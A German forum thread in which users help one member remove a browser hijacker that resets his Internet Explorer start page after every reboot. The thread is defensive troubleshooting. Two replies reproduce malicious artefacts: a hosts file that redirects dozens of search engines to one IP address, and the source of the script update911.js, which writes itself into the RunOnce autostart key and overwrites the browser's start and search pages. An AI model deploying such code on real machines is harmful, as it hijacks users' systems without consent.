Startseite von IE wird geändert..!!!

  • Hi!
    Hab seit gestern ein kleines Problemchen das ich nicht in den Griff bekomme... und zwar habe ich seit gestern immer nach einem Neustart meines PCs die Seite http://81.211.105.9/index.php?v=1 als Startseite meines IE6.
    Wenn ich das dann ändere mit Extras->Internetoptionen->Startseite, funktionierts wieder, aber eben nur bis zu einem Neustart des PCs, dann ist wieder diese sch*** Seite die Startseite.
    Hab mich auch schon in der Registry auf die Suche gemacht... da findet sich besagte page als Wert im key
    HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
    und im key
    HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Search Page

    Dortiges Ändern bewirkt das selbe wie wenn ichs im IE selbst änder: Zuerst klappts, nach Neustart nimma.

    Hab meinen PC auch schon mit Ad-aware durchsucht; das findet außer 3 Cookies von der orf.at Seite auch nix.

    Habts ihr Ideen? Hat das schon mal jemand erlebt?

    thx, cu, Sensei

    ------------------------------------------------------------
    Where you live should not decide,
    whether you live or whether you die
    Bono, "Crumbs from your Table"
    ------------------------------------------------------------

  • Zitat von Sensei



    Hab meinen PC auch schon mit Ad-aware durchsucht; das findet außer 3 Cookies von der orf.at Seite auch nix.


    hast schon mal gschaut, was alles automatisch gestartet wird?
    (ausführen -> msconfig -> autostart)
    vielleicht solltest dort mal alles verdächtige rausschmeissen, kann ja sein, dass ad-aware den übeltäter nicht findet...

    w.b.f.z.a.r.

  • hab ich auch schon gemacht... da is nur mehr mein virenscanner und ms office.
    danke für die schnelle antwort trotzdem... sonst noch tipps?

    ------------------------------------------------------------
    Where you live should not decide,
    whether you live or whether you die
    Bono, "Crumbs from your Table"
    ------------------------------------------------------------

  • hmmm...das hab ich ja schon gemacht (siehe mein erstes post).... und mit dem bearbeiten->suchen ding gehts irgendwie net... da hab ich jetzt auch danach gesucht und er hat mir gar keineergebnisse angezeigt (obwohl ich unter oben genanntem schlüssel genau den wert nachdem ich gesucht habe ja händisch gefunden habe)... ärgerlich sit das...!
    danke für deine bemühungen; wenn wer noch ideen hat: nur her damit!

    ------------------------------------------------------------
    Where you live should not decide,
    whether you live or whether you die
    Bono, "Crumbs from your Table"
    ------------------------------------------------------------

  • Zitat von Sensei

    hmmm...das hab ich ja schon gemacht


    und das "alles-verdächtige-ausm-autostart-werfen" auch?
    (und am besten danach gleich die gleichnamigen prozesse im taskmanager beenden, sonst stehts am ende wieder im autostart)

    w.b.f.z.a.r.

  • check mal deine hosts datei ;) hatte das gleiche Problem, dort wurden alle Suchmaschinen (naja, so etwa 25 davon) auf etwa so eine Seite weitergeleitet :)
    war sowas wie trojan.qhosts

    Greets X :coolsmile

  • so was ähnliches hab ich auch mal gehabt - einmal aus Bequemlichkeit mit dem Iexplorer gesurft und schon passiert...

    Da wurde bei jedem Programmstart über eine "load.bat" im Windows-Verzeichnis wieder die Registry geändert. Den Aufruf dieser .bat hab ich nie gefunden, aber wenigstens den Inhalt eliminiert.

  • das sind meistens sogenannte plugins.. leider nicht so leicht zu finden... die häufigste variante: in der registry gibt es einen eintrag 'ie plugins'. die beste methode ist, in der registry nach der geänderten adresse der startseite zu suchen.


    lg michi

  • Hi!
    Danke mal für eure zahlreichen Antworten. Gefunden hab ich den Übelktäter immer noch nicht.
    Ich habe folgendes gemacht:

    - Startseite händisch geändert
    - Lavasoft Ad-aware drüberlaufen lassen, alles verdächtige gelöscht
    - Spybot drüberlaufen lassen, alles verdächtige gelöscht
    - mit msconfig alle verdächtigen Einträge deaktiviert (bei Systemstart)
    - besagte Seite http://81.211.105.9/index.php?v=1 in der Registry gesucht; dort unter 2 keys gefunden (siehe erstes Post), diese händisch geändert --> beim nächsten systemstart waren sie wieder überschrieben.
    - die hosts.2 Datei aus C:\WINDOWS\system32 angesehen; da sind zwar ein paar Einträge, von besagter Seite steht dort aber nix
    - nach einer load.bat hab ich auch gesucht - nix gefunden.

    Was noch offen wäre, ist die Sac he mit den PlugIns bzw. wenn ihr noch andere Ideen hättet. Wie soll ich das mit den Plugins machen...?! Ich find da irgendwie nix gscheits...!

    Danke euch, Sensei

    ------------------------------------------------------------
    Where you live should not decide,
    whether you live or whether you die
    Bono, "Crumbs from your Table"
    ------------------------------------------------------------

  • schau ob du eine hostsfile in c:\windows\help hast, hatte ich nämlich, in der standen dann solche dinge wie

    88.88.88.88 elite
    207.44.220.30 http://www.google.akadns.net
    207.44.220.30 http://www.google.com
    207.44.220.30 google.com
    207.44.220.30 http://www.altavista.com
    207.44.220.30 altavista.com
    207.44.220.30 search.yahoo.com
    207.44.220.30 uk.search.yahoo.com
    207.44.220.30 ca.search.yahoo.com
    207.44.220.30 jp.search.yahoo.com
    207.44.220.30 au.search.yahoo.com
    207.44.220.30 de.search.yahoo.com
    207.44.220.30 search.yahoo.co.jp
    207.44.220.30 http://www.lycos.de
    207.44.220.30 http://www.lycos.ca
    207.44.220.30 http://www.lycos.jp
    207.44.220.30 http://www.lycos.co.jp
    207.44.220.30 alltheweb.com
    207.44.220.30 web.ask.com
    207.44.220.30 ask.com
    207.44.220.30 http://www.ask.com
    207.44.220.30 http://www.teoma.com
    207.44.220.30 search.aol.com
    207.44.220.30 http://www.looksmart.com
    207.44.220.30 auto.search.msn.com
    207.44.220.30 search.msn.com
    207.44.220.30 ca.search.msn.com
    207.44.220.30 fr.ca.search.msn.com
    207.44.220.30 search.fr.msn.be
    207.44.220.30 search.fr.msn.ch
    207.44.220.30 search.latam.yupimsn.com
    207.44.220.30 search.msn.at
    207.44.220.30 search.msn.be
    207.44.220.30 search.msn.ch
    207.44.220.30 search.msn.co.in
    207.44.220.30 search.msn.co.jp
    207.44.220.30 search.msn.co.kr
    207.44.220.30 search.msn.com.br
    207.44.220.30 search.msn.com.hk
    207.44.220.30 search.msn.com.my
    207.44.220.30 search.msn.com.sg
    207.44.220.30 search.msn.com.tw
    207.44.220.30 search.msn.co.za
    207.44.220.30 search.msn.de
    207.44.220.30 search.msn.dk
    207.44.220.30 search.msn.es
    207.44.220.30 search.msn.fi
    207.44.220.30 search.msn.fr
    207.44.220.30 search.msn.it
    207.44.220.30 search.msn.nl
    207.44.220.30 search.msn.no
    207.44.220.30 search.msn.se
    207.44.220.30 search.ninemsn.com.au
    207.44.220.30 search.t1msn.com.mx
    207.44.220.30 search.xtramsn.co.nz
    207.44.220.30 search.yupimsn.com
    207.44.220.30 uk.search.msn.com
    207.44.220.30 search.lycos.com
    207.44.220.30 http://www.lycos.com
    207.44.220.30 http://www.google.ca
    207.44.220.30 google.ca
    207.44.220.30 http://www.google.uk
    207.44.220.30 http://www.google.co.uk
    207.44.220.30 http://www.google.com.au
    207.44.220.30 http://www.google.co.jp
    207.44.220.30 http://www.google.jp
    207.44.220.30 http://www.google.at
    207.44.220.30 http://www.google.be
    207.44.220.30 http://www.google.ch
    207.44.220.30 http://www.google.de
    207.44.220.30 http://www.google.se
    207.44.220.30 http://www.google.dk
    207.44.220.30 http://www.google.fi
    207.44.220.30 http://www.google.fr
    207.44.220.30 http://www.google.com.gr
    207.44.220.30 http://www.google.com.hk
    207.44.220.30 http://www.google.ie
    207.44.220.30 http://www.google.co.il
    207.44.220.30 http://www.google.it
    207.44.220.30 http://www.google.co.kr
    207.44.220.30 http://www.google.com.mx
    207.44.220.30 http://www.google.nl
    207.44.220.30 http://www.google.co.nz
    207.44.220.30 http://www.google.pl
    207.44.220.30 http://www.google.pt
    207.44.220.30 http://www.google.com.ru
    207.44.220.30 http://www.google.com.sg
    207.44.220.30 http://www.google.co.th
    207.44.220.30 http://www.google.com.tr
    207.44.220.30 http://www.google.com.tw
    207.44.220.30 go.google.com
    207.44.220.30 google.at
    207.44.220.30 google.be
    207.44.220.30 google.de
    207.44.220.30 google.dk
    207.44.220.30 google.fi
    207.44.220.30 google.fr
    207.44.220.30 google.com.hk
    207.44.220.30 google.ie
    207.44.220.30 google.co.il
    207.44.220.30 google.it
    207.44.220.30 google.co.kr
    207.44.220.30 google.com.mx
    207.44.220.30 google.nl
    207.44.220.30 google.co.nz
    207.44.220.30 google.pl
    207.44.220.30 google.com.ru
    207.44.220.30 google.com.sg
    207.44.220.30 http://www.hotbot.com
    207.44.220.30 hotbot.com

    und in der Registry wurde die offizielle Adresse der Hosts datei dorthingeleitet

    Greets X :coolsmile

  • also eine Datei hosts.* hab ich da nicht... nur einen Haufen Hilfedateien mit Endungen wie .chm, .hlp, .cnt usw! Aber eben nix auch nur annähernd mit hosts.* .... und dann noch folgende 4 .dll dateien:
    C:\WINDOWS\Help\bnts.dll
    C:\WINDOWS\Help\sniffpol.dll
    C:\WINDOWS\Help\sstub.dll
    C:\WINDOWS\Help\tshoot.dll

    Habts ihr die auch?
    Sonst noch Anregungen um mein Prob. zu lösen (bitte nicht mit "PC neu aufsetzen" oder so... ;))

    thx!

    ------------------------------------------------------------
    Where you live should not decide,
    whether you live or whether you die
    Bono, "Crumbs from your Table"
    ------------------------------------------------------------

  • probier mal ad-aware... vielleicht hast damit mehr glück als mit spybot.

    Otto: Apes don't read philosophy. - Wanda: Yes they do, Otto, they just don't understand
    Beleidigungen sind Argumente jener, die über keine Argumente verfügen.
    «Signanz braucht keine Worte.» | «Signanz gibts nur im Traum.» 

    Das neue MTB-Projekt (PO, Wiki, Mitschriften, Ausarbeitungen, Folien, ...) ist online
    http://mtb-projekt.at

  • ad-aware hab ich schon probiert (siehe meine posts weiter oben).

    ABER:

    BIN SOEBEN FÜNDIG GEWORDEN IM pc-praxis.de Forum für WinXP:


    Das hat GEKLAPPT, also falls mal einer von euch so ein Prob hat...!

    DANKE AUF JEDEN FALL AN ALLE FÜR EURE GROßARTIGE UNTERSTÜTZUNG!!!

    CU, SENSEI

    ------------------------------------------------------------
    Where you live should not decide,
    whether you live or whether you die
    Bono, "Crumbs from your Table"
    ------------------------------------------------------------


  • gratuliere :)

    hat jemand eine fachliche erklärung dafür??

    lg michi

  • Nunja, fachliche Erklärung .. gleich das erste Ergebnis bei der Suche nach update911.js in Google fördert im Chip Online Forum folgendes zu Tage:

    var url = "http://81.211.105.8/index.php?v=1";
    var burl = "http://81.211.105.8/search.php?v=1";
    var fso = new ActiveXObject("Scripting.FileSystemObject");
    var tfolder = fso.GetSpecialFolder(0);
    var filepath = tfolder + "\\update911.js";
    var Shell = new ActiveXObject("WScript.Shell");
    Shell.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\tlc",filepath);
    Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",url);
    Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Page",url);
    Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar",burl);
    Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst","no");
    Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Custom Search URL",1,"REG_DWORD");

    Der Eintrag war mit hoher Wahrscheinlichkeit die ganze Zeit im RunOnce Schlüssel und wurde von sensei einfach übersehen. :shinner:

  • Tja und wohl auch mein Posting von oben. autoruns listet alles auf was bei XP so autostarten kann, auch die IE-Plugins...
    Und ein update911.js im RunOnce is ja echt kein großartig verschleierter autostart ;)
    mfg Zentor

  • sorry hätte wohl mal selber googeln sollen :shinner:
    man kann über das autorun direkt javascripts starten? oder geht das eh über den ie?

    Zentor: msconfig machts eigentlich auch im großen und ganzen.. wenn man zb xp hat. hab bis jetzt noch nie was gesehen was automatisch gestartet ist und nicht dort drinstand.. obwohls ja da glaube ich noch zwei oder drei hintertürchen gibt...

    lg michi

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!